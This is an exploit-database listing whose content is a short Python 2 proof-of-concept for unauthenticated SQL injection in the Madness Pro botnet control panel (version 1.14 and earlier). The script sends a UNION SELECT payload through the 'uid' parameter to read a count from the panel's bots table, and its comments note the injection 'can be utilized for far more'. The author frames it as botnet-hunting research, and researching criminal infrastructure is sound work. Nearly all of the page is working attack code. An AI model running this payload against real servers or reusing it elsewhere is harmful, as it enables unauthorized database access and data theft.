Madness Pro <= 1.14 - SQL Injection
| EKU-ID: 4077 | CVE: | OSVDB-ID: |
| Author: bwall | Published: 2014-06-09 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 4077 | CVE: | OSVDB-ID: |
| Author: bwall | Published: 2014-06-09 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
#!/usr/bin/env python2 # -*- coding: utf-8 -*- # Exploit Title: Madness Pro <= 1.14 SQL injection # Date: June 05, 2014 # Exploit Author: @botnet_hunter # Version: 1.14 # Tested on: Apache2 - Ubuntu - MySQL # ▄▄▌ ▄▄▄▄· ▄▄▄▄▄ • ▌ ▄ ·. ▄· ▄▌ # ██• ▪ ▐█ ▀█▪▪ •██ ▪ ·██ ▐███▪▐█▪██▌ # ██▪ ▄█▀▄ ▐█▀▀█▄ ▄█▀▄ ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▐█▌▐█▪ # ▐█▌▐▌▐█▌.▐▌██▄▪▐█▐█▌.▐▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌ ▐█▀·. # .▀▀▀ ▀█▄▀▪·▀▀▀▀ ▀█▄▀▪ ▀▀▀ ▀█▄▀▪▀▀ █▪▀▀▀ ▀ • # ▄▄· ▄• ▄▌▄▄▄ ▪ ▐ ▄ ▄▄ • • ▌ ▄ ·. ▄▄▄· ·▄▄▄▄ ▐ ▄ ▄▄▄ ..▄▄ · .▄▄ · # ▐█ ▌▪█▪██▌▀▄ █·██ •█▌▐█▐█ ▀ ▪ ·██ ▐███▪▐█ ▀█ ██▪ ██ •█▌▐█▀▄.▀·▐█ ▀. ▐█ ▀. # ██ ▄▄█▌▐█▌▐▀▀▄ ▐█·▐█▐▐▌▄█ ▀█▄ ▐█ ▌▐▌▐█·▄█▀▀█ ▐█· ▐█▌▐█▐▐▌▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄ # ▐███▌▐█▄█▌▐█•█▌▐█▌██▐█▌▐█▄▪▐█ ██ ██▌▐█▌▐█ ▪▐▌██. ██ ██▐█▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█ # ·▀▀▀ ▀▀▀ .▀ ▀▀▀▀▀▀ █▪·▀▀▀▀ ▀▀ █▪▀▀▀ ▀ ▀ ▀▀▀▀▀• ▀▀ █▪ ▀▀▀ ▀▀▀▀ ▀▀▀▀ # # Unauthenticated SQL injection in Madness Pro panel <= 1.14 # Proof of Concept retrieves a count of the bots, although it can be utilized for far more # Discovered and developed by bwall @botnet_hunter # # References: # http://blog.cylance.com/a-study-in-bots-lobotomy # import urllib # Fill in URL that Madness Pro bot connects back to panel_url = "" def run_sqli_proof_of_concept(panel_index_url): f = urllib.urlopen("{0}?uid='%20OR%201=2%20UNION%20ALL%20SELECT%201,1,1,CONCAT('bot-count:',COUNT(*))%20FROM%20bots" "%20--%20--".format(panel_index_url)) print f.read() run_sqli_proof_of_concept(panel_url)